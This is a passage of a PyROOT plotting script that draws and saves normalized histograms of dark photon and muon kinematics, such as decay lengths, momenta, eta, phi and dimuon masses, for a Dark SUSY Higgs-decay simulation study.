#h_gammaD_cT_XY_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{xy}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_XY_lab.Fit("myfit").Draw("same")
h_gammaD_cT_XY_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_XY_lab.SetXTitle("L_{xy} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.C")
# Longitudinal decay length L_z.
h_gammaD_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_Z_lab)
h_gammaD_cT_Z_lab.Scale(1/normConstant)
h_gammaD_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_Z_lab,h_gammaD_cT_Z_lab_dummy)
#h_gammaD_cT_Z_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{z}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_Z_lab.Fit("myfit").Draw("same")
h_gammaD_cT_Z_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_Z_lab.SetXTitle("L_{z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.C")
# Same ctau distributions split by pT rank (leading vs sub-leading gammaD).
h_gammaD_1_cT_dummy.Draw()
normConstant = integral(h_gammaD_1_cT)
h_gammaD_1_cT.Scale(1/normConstant)
h_gammaD_1_cT.Draw("same")
normConstant2 = integral(h_gammaD_2_cT)
h_gammaD_2_cT.Scale(1/normConstant2)
h_gammaD_2_cT.Draw("same")
scaleAxisYcT(h_gammaD_2_cT,h_gammaD_1_cT_dummy)
#h_gammaD_1_cT.DrawNormalized("same")
#h_gammaD_2_cT.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.C")
# pT-ranked lab-frame decay lengths.
h_gammaD_1_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_lab)
h_gammaD_1_cT_lab.Scale(1/normConstant)
h_gammaD_1_cT_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_lab)
h_gammaD_2_cT_lab.Scale(1/normConstant2)
h_gammaD_2_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_lab,h_gammaD_1_cT_lab_dummy)
#h_gammaD_1_cT_lab.DrawNormalized("same")
#h_gammaD_2_cT_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.C")
h_gammaD_1_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_XY_lab)
h_gammaD_1_cT_XY_lab.Scale(1/normConstant)
h_gammaD_1_cT_XY_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_XY_lab)
h_gammaD_2_cT_XY_lab.Scale(1/normConstant2)
h_gammaD_2_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_XY_lab,h_gammaD_1_cT_XY_lab_dummy)
#h_gammaD_1_cT_XY_lab.DrawNormalized("same")
#h_gammaD_2_cT_XY_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_XY_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_XY_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.C")
h_gammaD_1_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_Z_lab)
h_gammaD_1_cT_Z_lab.Scale(1/normConstant)
h_gammaD_1_cT_Z_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_Z_lab)
h_gammaD_2_cT_Z_lab.Scale(1/normConstant2)
h_gammaD_2_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_Z_lab,h_gammaD_1_cT_Z_lab_dummy)
#h_gammaD_1_cT_Z_lab.DrawNormalized("same")
#h_gammaD_2_cT_Z_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_Z_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_Z_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.C")
h_gammaD_1_pT_dummy.Draw()
h_gammaD_1_pT.DrawNormalized("same")
h_gammaD_2_pT.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pT,h_gammaD_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.C")
h_gammaD_1_pZ_dummy.Draw()
#plotOverflow(h_gammaD_1_pZ)
#plotOverflow(h_gammaD_2_pZ)
h_gammaD_1_pZ.DrawNormalized("same")
h_gammaD_2_pZ.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pZ,h_gammaD_1_pZ_dummy)
#htmp = ROOT.TH1F(h_gammaD_1_pZ.GetName(),h_gammaD_1_pZ.GetTitle(), h_gammaD_1_pZ.GetNbinsX()+1, h_gammaD_1_pZ.GetBinLowEdge(1), h_gammaD_1_pZ.GetBinLowEdge(h_gammaD_1_pZ.GetNbinsX()+1)+h_gammaD_1_pZ.GetBinWidth(h_gammaD_1_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_1_pZ.GetNbinsX()+1 ):
# htmp.Fill(htmp.GetBinCenter(i), h_gammaD_1_pZ.GetBinContent(i))
#htmp.Fill(h_gammaD_1_pZ.GetNbinsX()-1, h_gammaD_1_pZ.GetBinContent(0))
#htmp.SetEntries(h_gammaD_1_pZ.GetEntries())
#htmp.SetLineColor(ROOT.kRed)
#htmp.DrawNormalized("same")
#htmp2 = ROOT.TH1F(h_gammaD_2_pZ.GetName(), h_gammaD_2_pZ.GetTitle(), h_gammaD_2_pZ.GetNbinsX()+1, h_gammaD_2_pZ.GetBinLowEdge(1), h_gammaD_2_pZ.GetBinLowEdge(h_gammaD_2_pZ.GetNbinsX()+1)+h_gammaD_2_pZ.GetBinWidth(h_gammaD_2_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_2_pZ.GetNbinsX()+1 ):
# htmp2.Fill(htmp2.GetBinCenter(i), h_gammaD_2_pZ.GetBinContent(i))
#htmp2.Fill(h_gammaD_2_pZ.GetNbinsX()-1, h_gammaD_2_pZ.GetBinContent(0))
#htmp2.SetEntries(h_gammaD_2_pZ.GetEntries())
#htmp2.SetLineColor(ROOT.kBlue)
#htmp2.DrawNormalized("same")
#h_gammaD_1_pZ.DrawNormalized("same")
#h_gammaD_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pZ,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pZ,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.C")
h_gammaD_1_Eta_dummy.Draw()
h_gammaD_1_Eta.DrawNormalized("same")
h_gammaD_2_Eta.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Eta,h_gammaD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Eta,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Eta,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.C")
h_gammaD_1_Phi_dummy.Draw()
h_gammaD_1_Phi.DrawNormalized("same")
h_gammaD_2_Phi.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Phi,h_gammaD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Phi,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Phi,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.C")
h_gammaD_1_p_dummy.Draw()
plotOverflow(h_gammaD_1_p)
plotOverflow(h_gammaD_2_p)
scaleAxisY(h_gammaD_2_p,h_gammaD_1_p_dummy)
#h_gammaD_1_p.DrawNormalized("same")
#h_gammaD_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_p,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_p,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.C")
h_gammaD_1_M_dummy.Draw()
cnv.SetLogx()
h_gammaD_1_M.DrawNormalized("same")
#h_gammaD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_gammaD_1_M,"1st dark photon (leading p_{T})","L")
#legend.AddEntry(h_gammaD_2_M,"2nd dark photon","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.C")
cnv.SetLogx(0)
h_muon_pT_dummy.Draw()
h_muon_pT_0.DrawNormalized("same")
h_muon_pT_1.DrawNormalized("same")
h_muon_pT_2.DrawNormalized("same")
h_muon_pT_3.DrawNormalized("same")
scaleAxisY(h_muon_pT_3,h_muon_pT_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pT_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pT_1,"2nd muon","L")
legend.AddEntry(h_muon_pT_2,"3rd muon","L")
legend.AddEntry(h_muon_pT_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.C")
h_muon_phi_dummy.Draw()
h_muon_phi_0.DrawNormalized("same")
h_muon_phi_1.DrawNormalized("same")
h_muon_phi_2.DrawNormalized("same")
h_muon_phi_3.DrawNormalized("same")
scaleAxisY(h_muon_phi_0,h_muon_phi_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_phi_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_phi_1,"2nd muon","L")
legend.AddEntry(h_muon_phi_2,"3rd muon","L")
legend.AddEntry(h_muon_phi_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.C")
h_muon_pZ_dummy.Draw()
h_muon_pZ_0.DrawNormalized("same")
h_muon_pZ_1.DrawNormalized("same")
h_muon_pZ_2.DrawNormalized("same")
h_muon_pZ_3.DrawNormalized("same")
scaleAxisY(h_muon_pZ_3,h_muon_pZ_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pZ_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pZ_1,"2nd muon","L")
legend.AddEntry(h_muon_pZ_2,"3rd muon","L")
legend.AddEntry(h_muon_pZ_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.C")
h_muon_p_dummy.Draw()
h_muon_p_0.DrawNormalized("same")
h_muon_p_1.DrawNormalized("same")
h_muon_p_2.DrawNormalized("same")
h_muon_p_3.DrawNormalized("same")
scaleAxisY(h_muon_p_3,h_muon_p_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_p_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_p_1,"2nd muon","L")
legend.AddEntry(h_muon_p_2,"3rd muon","L")
legend.AddEntry(h_muon_p_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.C")
h_muon_eta_dummy.Draw()
h_muon_eta_0.DrawNormalized("same")
h_muon_eta_1.DrawNormalized("same")
h_muon_eta_2.DrawNormalized("same")
h_muon_eta_3.DrawNormalized("same")
scaleAxisY(h_muon_eta_0,h_muon_eta_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_eta_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_eta_1,"2nd muon","L")
legend.AddEntry(h_muon_eta_2,"3rd muon","L")
legend.AddEntry(h_muon_eta_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.C")
#h_dimuon_m_dummy.Draw()
#h_dimuon_m_0.DrawNormalized("same")
#h_dimuon_m_1.DrawNormalized("same")
#h_dimuon_m_2.DrawNormalized("same")
#h_dimuon_m_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
## convert -define.pdf:use-cropbox=true -density 300 CSxBR_vs_mh.pdf -resize 900x900 CSxBR_vs_mh.png
#
#h_dimuon_m_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_log_0.DrawNormalized("same")
#h_dimuon_m_log_1.DrawNormalized("same")
#h_dimuon_m_log_2.DrawNormalized("same")
#h_dimuon_m_log_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_log_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_log_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.png")
#cnv.SetLogy(0)
#
#h_dimuon_m_real_fake_dummy.Draw()
#h_dimuon_m_real_fake_0.DrawNormalized("same")
#h_dimuon_m_real_fake_1.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.png")
#
#h_dimuon_m_real_fake_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_real_fake_log_0.DrawNormalized("same")
#h_dimuon_m_real_fake_log_1.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_log_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_log_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.png")
cnv.SetLogy(0)
h_m1_vs_m2.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.C")
cnv.SetLogx()
h_m2.Draw()
h_m1.Draw("same")
info.Draw()
txtHeader.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.C")
cnv.SetLogx(0)
h_dimuon_m_fake_dummy.Draw()
h_dimuon_m_fake_0.DrawNormalized("same")
scaleAxisY(h_dimuon_m_fake_0,h_dimuon_m_fake_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.C")
h_dimuon_m_fake_log_dummy.Draw()
cnv.SetLogy()
cnv.SetLogx()
h_dimuon_m_fake_log_0.DrawNormalized("same")
#scaleAxisY(h_dimuon_m_fake_log_0,h_dimuon_m_fake_log_dummy)
info.Draw()
txtHeader.Draw()
